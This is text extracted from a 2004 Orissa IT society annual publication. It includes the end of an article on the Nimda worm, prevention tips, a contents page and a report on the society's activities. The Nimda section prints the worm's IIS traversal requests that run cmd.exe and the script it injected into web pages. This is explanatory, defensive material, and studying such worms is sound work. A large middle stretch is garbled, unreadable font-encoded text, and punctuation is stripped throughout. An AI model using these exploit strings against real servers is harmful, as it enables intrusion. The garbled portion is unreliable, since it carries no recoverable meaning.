GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 4: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

CONTENTS

1 Activities of OITS 2003-2004 SP Misra 1

2 The Transition from Physical Governance Raj Kumar Prasad 9to e-Governance

3 Application of Data Fusion in Computer Sateesh Pradhan ampForensics Suneeta Satpathy 16

4 Interesting Patterns in CITs A Misra 21

5 Experiences amp Learning from Organisingan International Conference in aDeveloping Country Laxman Mohanty 25

6 Guiding Seminars and Projects forUndergraduate Engineering Students M N Das 29

7 Case study on ICT and e-Gov Krishnan V D G 32Quarterly Progress Report (April-June 2003)

8 Known Malware Exploitation Abhishek Bhuyan 37

9 LOtilde EcircOcircVethornethorn S_ecirc J aTHORNLETHh OgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH 41

Orissa Information Technology Society(OITS)

From April 2003 to March 2004

A Orissa Information Technology Olympiad(Held on 7th September 2003 )

Orissa Information Technology Society(OITS) conducted the annual quiz test at senior(MCA BE BSc(Eng) and BSc(hons)) and junior(upto class XII) levels with separate questionson 7th September 2003 The test to be held onthe last sunday of august or the first sunday ofseptember was originally scheduled to be on31st august but was shifted by a week as ganeshpuja was there on that day We contactedBerhampur Puri SambalpurBurla RourkelaSarang Cuttack Raygada Balasore DamanjodiParadeep Angul and Bhubaneswar About 1200students registered for the same and aroundeleven hundred students appeared This yearthere was a very positive response from RourkelaSambalpurBurla Raygada and Balasore andsome other places as additional venues ProfSudarshan Padhy Coordinator IT Olympiadmainly organised this activity and he was ablyassisted by many volunteers including MTech(Comp Sc) students (they were not eligible tocontest) and young faculty members The resultsat senior and junior levels are as below

The first three rank holders in the seniorlevel were

1 Puspita Ray IMCA 9th Semester (Utkal Un)

2 Parthasarathi Dash Un College of Eng BE(cs) 7th Semester (burla)

Activities of OITS 2003-2004

SP Misra

3 Geeta Mohanty MCA 2nd Semester (KIIT bbs)

The first three rank holders in the juniorlevel were

1 Bagdevi Panda Class XII DAV Public SchoolCDA Cuttack

2 Siladitya Mohapatra Class X St Paul SchoolRourkela

3 Amulya Ratna Dash Class X BlessedSacrament High School Puri

Names of the other rank holders may beseen in the appropriate website

B Orissa IT Olympiad Prize Distribution held on 18th january 2004

The IT olympiad prize distribution functionwas held on 18th January 2004 at 230 pm TheChief Guest was Bikramjit Maitra Head InfosysCentre at Bhubaneswar and the guest of honourwas Gautam Parija administrative head InfosysCentre Bhubaneswar Arun SamantarayAdministrator Utkal University presided overthe function All the prize winners along withtheir teachers were invited to the function Alsothe parents of the prize winners at junior levelwere separetely invited There were altogetherabout 70 to 80 participants

The president of oits S P Misra welcomedthe participants Next Sudarshan PadhyCoordinator IT olympiad program spoke aboutthe conduct of the olympiad examination andreferred to the fact that on this occasion therewere about nineteen centres in which thestudents appeared spread all over Orissa

OITS-2004

1

OITS-2004

2

Prizes were distributed by the Chief GuestBikramjit Maitra In the senior category the firstsecond and third rank examinees were givencash prizes of Rs3000- Rs2000- andRs1000- respectively and consolation prizesof Rs500- each for the remaining eightexaminees above along with certificates In thejunior category also the first second and thirdrank examinees were given cash prizes ofRs3000- Rs2000- and Rs1000-respectively and consolation prizes of Rs500- each for the remaining nine examinees alongwith certificates Most of the prize winners tookthese prizes and for those who were absent theamounts along with the certificates were sentby courier

The Chief Guest addressed the gatheringemphasizing the relevance of IT in all phases ofour Society He also mentioned that Infosys hasalways wanted to increase the number ofselected candidates from Orissa if they satisfyminimal norms needed for it He mentioned thatparallel to Olympiad tests the selection processin Infosys takes into account not only thebackground knowledge of the candidates butalso their ability to think and adapt themselvesto learn new techniques in computer scienceGautam Parija also emphasized that for selectionin Infosys the ability of candidates as such shallalways be as important as the knowledge theyhave already acquired

Arun K Samantarai Administrator UtkalUniversity also focussed on the role of IT inSociety He particularly emphasized the needfor closer collaboration with industry to makesuch programs a success While all lauded thisactivity of oits Sri Samantarai emphasized thatassistance could be sought from Industry forsuch programs

S P Misra emphasized on two aspects foran extension of the Olympiad activity (i) Hementioned that there is an attempt to coordinatethis activity with a similar activity at all Indialevel so that they can avail of internationalcompetetion and that (ii) from next year we mayhave a short training program of the beststudents appearing in the olympiad On behalfof Infosys Mr Maitra assured that help for thiscan be available from them

There was then a tea break after which likelast year an interactive session was conductedin the presence of Bikramjit Maitra and GautamParija Here students asked many questionswhich were mainly answered by the visitorsalong with open house discussions participatedby many experts and students

The meeting ended with a vote of thanksby Ajit Nayak treasurer oits as the secretarywas absent

C Opening of SAMBALPUR CHAPTER inaugurated on 29112003

In october 2003 about eleven oits membersfrom sambalpur area wanted that we may openthe sambalpur chapter of oits The president thenlocated the earlier members around sambalpurarea and also asked some members outsideorissa whether they would like to join thischapter The executive committee which met on16112003 then approved that we may open thischapter as per article 6 of the bylaws andconvenor for this chapter B Patel of G M Collegesambalpur was intimated accordingly

The chapter was formally inaugurated byProf M C Dash vice-chancellor sambalpuruniversity in a function at G M College premiseson 29112003 Prof Arun Pujari of hyderabaduniversity was the chief speaker He gave anilluminating semi-technical talk on artificial

OITS-2004

3

